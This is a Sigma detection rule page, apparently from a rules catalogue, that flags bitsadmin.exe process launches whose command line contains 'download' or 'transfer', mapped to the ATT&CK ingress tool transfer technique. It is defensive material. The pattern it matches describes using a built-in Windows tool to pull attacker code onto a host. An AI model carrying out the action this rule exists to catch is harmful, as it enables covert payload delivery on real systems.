BITSAdmin Downloading Malicious Binaries
Detects usage of BITSAdmin to download malicious code. Inspired by the 2022 Red Canary Threat Detection report.
Sigma rule (View on GitHub)
1title: BITSAdmin Downloading Malicious Binaries
2id: c7568c9e-f6c6-4cb7-a3c0-da356aef51d8
3status: experimental
4description: Detects usage of BITSAdmin to download malicious code. Inspired by the
5 2022 Red Canary Threat Detection report.
6references:
7 - https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/
8 - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md#atomic-test-9---windows---bitsadmin-bits-download
9author: Micah Babinski
10date: 2022/11/03
11tags:
12 - attack.command_and_control
13 - attack.t1105
14logsource:
15 category: process_creation
16 product: windows
17detection:
18 selection:
19 Image|endswith: '\bitsadmin.exe'
20 CommandLine|contains:
21 - 'download'
22 - 'transfer'
23 condition: selection
24falsepositives:
25 - Unknown
26level: high```
References
-
Ingress Tool Transfer is a technique adversaries leverage to bring their own external tools into a compromised network.
Read More -
Small and highly portable detection tests based on MITRE's ATT&CK. - redcanaryco/atomic-red-team
Read More